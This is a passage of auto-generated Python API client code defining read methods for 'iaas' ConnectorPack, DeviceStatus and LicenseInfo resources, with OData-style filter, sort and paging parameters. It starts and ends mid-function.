>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasConnectorPack
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_connector_pack_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_iaas_connector_pack_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'iaas.ConnectorPack' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_connector_pack_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasConnectorPack, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_iaas_connector_pack_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_iaas_connector_pack_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/ConnectorPacks/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasConnectorPack', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_connector_pack_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.ConnectorPack' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_connector_pack_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasConnectorPackList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_connector_pack_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_connector_pack_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'iaas.ConnectorPack' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_connector_pack_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasConnectorPackList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_connector_pack_list" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/ConnectorPacks',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasConnectorPackList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_device_status_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.DeviceStatus' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_device_status_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasDeviceStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_device_status_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_iaas_device_status_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'iaas.DeviceStatus' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_device_status_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasDeviceStatus, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_iaas_device_status_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_iaas_device_status_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/DeviceStatuses/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasDeviceStatus', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_device_status_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.DeviceStatus' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_device_status_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasDeviceStatusList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_device_status_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_device_status_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'iaas.DeviceStatus' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_device_status_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasDeviceStatusList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_device_status_list" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/DeviceStatuses',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasDeviceStatusList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_license_info_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'iaas.LicenseInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_license_info_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasLicenseInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_license_info_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_iaas_license_info_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'iaas.LicenseInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_license_info_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasLicenseInfo, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_iaas_license_info_by_moid" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_iaas_license_info_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/iaas/LicenseInfos/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IaasLicenseInfo', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_iaas_license_info_list(self, **kwargs): # noqa: E501
"""Read a 'iaas.LicenseInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_license_info_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IaasLicenseInfoList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_iaas_license_info_list_with_http_info(
**kwargs) # noqa: E501
def get_iaas_license_info_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'iaas.LicenseInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_iaas_license_info_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IaasLicenseInfoList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
